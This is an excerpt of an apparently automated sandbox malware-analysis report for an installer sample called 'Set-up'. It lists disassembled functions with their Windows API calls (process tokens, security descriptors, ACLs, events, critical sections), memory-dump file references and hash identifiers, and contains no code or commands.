                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalException@8SectionThrow$CurrentEnterErrorFrequencyLastLeavePerformanceQueryThread
                                                                                                                                  • String ID: QueryPerformanceFrequency()
                                                                                                                                  • API String ID: 2762641212-1441144594
                                                                                                                                  • Opcode ID: 069122601470d904a0a6e1eaae4e209beee191959384b85193da5b62db5cca08
                                                                                                                                  • Instruction ID: b9fe9fc2557ff01daafe57311db49fb039169087b09dc0d96f1950a1326bdf5c
                                                                                                                                  • Opcode Fuzzy Hash: 069122601470d904a0a6e1eaae4e209beee191959384b85193da5b62db5cca08
                                                                                                                                  • Instruction Fuzzy Hash: 7211E5715183059BC314EF24D80974ABBE8FB88710F100D1DF5B4D2280EF71D5288796
                                                                                                                                  Function 00E59DF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000,00000008,460C02D8,460C02D8,?), ref: 00E59E1F
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,?,?,00000000,01166088,000000FF), ref: 00E59E2B
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E59E5A
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorExceptionException@8LastOpenProcessRaiseThrowToken
                                                                                                                                  • String ID: OpenProcessToken()
                                                                                                                                  • API String ID: 4287247744-2162204382
                                                                                                                                  • Opcode ID: b8ff9aceef9ee5ec0183b8e642727459f7de7c6d98ffc1a0a8a1449a026d1eee
                                                                                                                                  • Instruction ID: da36b8564c1d644c46e5af09be68d8a2ad680923c79748d25fe5f2dd17a86a2d
                                                                                                                                  • Opcode Fuzzy Hash: b8ff9aceef9ee5ec0183b8e642727459f7de7c6d98ffc1a0a8a1449a026d1eee
                                                                                                                                  • Instruction Fuzzy Hash: 01119E71A50219EBCB14EFA8CC42BDEBBF8FB04B10F104669F911B7280DB756908CB90
                                                                                                                                  Function 00E5A880 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetSecurityDescriptorControl.ADVAPI32(?,00001000,00001000), ref: 00E5A895
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,00001000,00001000), ref: 00E5A8A7
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A8D2
                                                                                                                                  Strings
                                                                                                                                  • SetSecurityDescriptorControl(), xrefs: 00E5A8B5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ControlDescriptorErrorException@8LastSecurityThrow
                                                                                                                                  • String ID: SetSecurityDescriptorControl()
                                                                                                                                  • API String ID: 2753198977-4156452905
                                                                                                                                  • Opcode ID: c7518a8378422181c0a1bbbc7537ef7d42ed081218cad63dc06436f96b7598de
                                                                                                                                  • Instruction ID: 32d3a71d9c85ed79a7d07bdf95114a8d43f39be179830a041ad4f304275560fc
                                                                                                                                  • Opcode Fuzzy Hash: c7518a8378422181c0a1bbbc7537ef7d42ed081218cad63dc06436f96b7598de
                                                                                                                                  • Instruction Fuzzy Hash: EBF02B31250308ABD314BF64DC47F457BE8BB14B56F104528F9449A1C0EBB2A858C7AA
                                                                                                                                  Function 00E5A470 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E5A450: LocalFree.KERNEL32 ref: 00E5A45A
                                                                                                                                  • SetEntriesInAclW.ADVAPI32(?,?,00000000), ref: 00E5A48A
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A4C2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EntriesException@8FreeLocalThrow
                                                                                                                                  • String ID: AddAccessAllowedAceEx()$SetEntriesInAcl()
                                                                                                                                  • API String ID: 864054697-3477462717
                                                                                                                                  • Opcode ID: de16eb603819d91dba0b7f2e382506a20b5571343fe88714a02c9374b0c54c53
                                                                                                                                  • Instruction ID: 4e2b1002075a05cab11d17b856842e7c4e700bd692a4b50849d2dd51728af63a
                                                                                                                                  • Opcode Fuzzy Hash: de16eb603819d91dba0b7f2e382506a20b5571343fe88714a02c9374b0c54c53
                                                                                                                                  • Instruction Fuzzy Hash: B9F0E5326603087AC630BA759C0BF8A3B9D5B11765F008A29FD24760C0EAB1A51883EA
                                                                                                                                  Function 00E82A90 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • ResetEvent.KERNEL32 ref: 00E82A9A
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E82AAA
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E82AD5
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorEventException@8LastResetThrow
                                                                                                                                  • String ID: ResetEvent()
                                                                                                                                  • API String ID: 3143289850-2767349721
                                                                                                                                  • Opcode ID: 67d1e250c12a4d5569edb5f79d955875356105a89a89030130fdeb76e3ae042c
                                                                                                                                  • Instruction ID: 9e46f1bd311b4a37536c4e23725d69d50de61d3b5ec723d91c3f58f5339daab4
                                                                                                                                  • Opcode Fuzzy Hash: 67d1e250c12a4d5569edb5f79d955875356105a89a89030130fdeb76e3ae042c
                                                                                                                                  • Instruction Fuzzy Hash: 4DE020316743056BC92CB6B5AD4BF0A369C6F00B16F400A6CFE19A10C4EF60A408C3B7
                                                                                                                                  Function 00E82A40 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • SetEvent.KERNEL32(?), ref: 00E82A4A
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E82A5A
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E82A85
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorEventException@8LastThrow
                                                                                                                                  • String ID: SetEvent()
                                                                                                                                  • API String ID: 2711642896-2184393977
                                                                                                                                  • Opcode ID: 9013a7d46335df6111781064796d9c5dda4422f8113ec8ead2fadd43c8d52689
                                                                                                                                  • Instruction ID: 46fb8b53fde66675d86db0c9031d23a0fa9a086e6a92bf4dc15cb793bd9fa3df
                                                                                                                                  • Opcode Fuzzy Hash: 9013a7d46335df6111781064796d9c5dda4422f8113ec8ead2fadd43c8d52689
                                                                                                                                  • Instruction Fuzzy Hash: 80E020716643046BC52CB6B55D4BF0D369C5F00B16F400AACFD28A10C4EF60A448C3B7
                                                                                                                                  Function 00E5F440 Relevance: 6.4, APIs: 5, Instructions: 116COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?), ref: 00E5F47F
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F5B3
                                                                                                                                    • Part of subcall function 00E5EFB0: EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?), ref: 00E5EFE9
                                                                                                                                    • Part of subcall function 00E5EFB0: LeaveCriticalSection.KERNEL32(0131B8F8,?,?), ref: 00E5F064
                                                                                                                                    • Part of subcall function 00E5EE70: GetConsoleScreenBufferInfo.KERNEL32(?,?,?,?,?,00E5F001,?,?), ref: 00E5EE9D
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,?), ref: 00E5F4F5
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F59B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave$BufferConsoleInfoScreen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3772441972-0
                                                                                                                                  • Opcode ID: 68f0cfd3a57ee5cd8280750d321a90ad39decfb04623d36d7bd05ffc98595ed7
                                                                                                                                  • Instruction ID: 79f08dc1a6be76636296cd796d82cd19fb1e40f02c8d2e3c25e54c2fcacef722
                                                                                                                                  • Opcode Fuzzy Hash: 68f0cfd3a57ee5cd8280750d321a90ad39decfb04623d36d7bd05ffc98595ed7
                                                                                                                                  • Instruction Fuzzy Hash: F441E030A04298DECB08CFA8D844BEDBBF4EF19719F101569E811B7385EB715E48CB61
                                                                                                                                  Function 00E5F2A0 Relevance: 6.4, APIs: 5, Instructions: 115COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?), ref: 00E5F2DF
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F410
                                                                                                                                    • Part of subcall function 00E5EFB0: EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?), ref: 00E5EFE9
                                                                                                                                    • Part of subcall function 00E5EFB0: LeaveCriticalSection.KERNEL32(0131B8F8,?,?), ref: 00E5F064
                                                                                                                                    • Part of subcall function 00E5EE70: GetConsoleScreenBufferInfo.KERNEL32(?,?,?,?,?,00E5F001,?,?), ref: 00E5EE9D
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,?), ref: 00E5F35B
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F3F8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave$BufferConsoleInfoScreen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3772441972-0
                                                                                                                                  • Opcode ID: 5aa5967a7922371b14fd644b84c462f37347a41f5681c01f1ce7d368084213f8
                                                                                                                                  • Instruction ID: 3f32107a265d9d29370b5d7cd61c7e1a203c34a193dadd8b791a58b7ba11852c
                                                                                                                                  • Opcode Fuzzy Hash: 5aa5967a7922371b14fd644b84c462f37347a41f5681c01f1ce7d368084213f8
                                                                                                                                  • Instruction Fuzzy Hash: C641DE30A04288DEDB18DFA8C545BDDBBB8EF19718F4005A9EC21B7385DB715E08CB20
                                                                                                                                  Function 00E5FED0 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 284COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,00000000,?), ref: 00E5FF13
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E60273
                                                                                                                                    • Part of subcall function 00E5EE70: GetConsoleScreenBufferInfo.KERNEL32(?,?,?,?,?,00E5F001,?,?), ref: 00E5EE9D
                                                                                                                                    • Part of subcall function 00E5EFB0: EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?), ref: 00E5EFE9
                                                                                                                                    • Part of subcall function 00E5EFB0: LeaveCriticalSection.KERNEL32(0131B8F8,?,?), ref: 00E5F064
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011FD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.0000000001216000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073062501.0000000001307000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073080127.0000000001308000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.0000000001319000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073101843.000000000131E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2073138636.00000000017B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave$BufferConsoleInfoScreen
                                                                                                                                  • String ID: !af_ && i<length()$basic_ncstring<wchar_t>::operator []
                                                                                                                                  • API String ID: 3772441972-589021327
                                                                                                                                  • Opcode ID: d9defbe05507fe06d8c60868238d62da11f360e297e6fad6df83c64768e2a87d
                                                                                                                                  • Instruction ID: 7f2cd4acb75ffeaa5ccd6481ae84a697cf3dfd8018fc6a6aeff46002f441fc98
                                                                                                                                  • Opcode Fuzzy Hash: d9defbe05507fe06d8c60868238d62da11f360e297e6fad6df83c64768e2a87d
                                                                                                                                  • Instruction Fuzzy Hash: 8AA11630A45269DBCF25DFA4E858BAFB7F8AF05358F041168E411BB2D5DB70A904C790
                                                                                                                                  Function 00E5BF80 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 240COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.2072612567.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011B2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.2072846495.00000000011F1000.00000002.00000001.01000000.00000003.sdmpDownload File
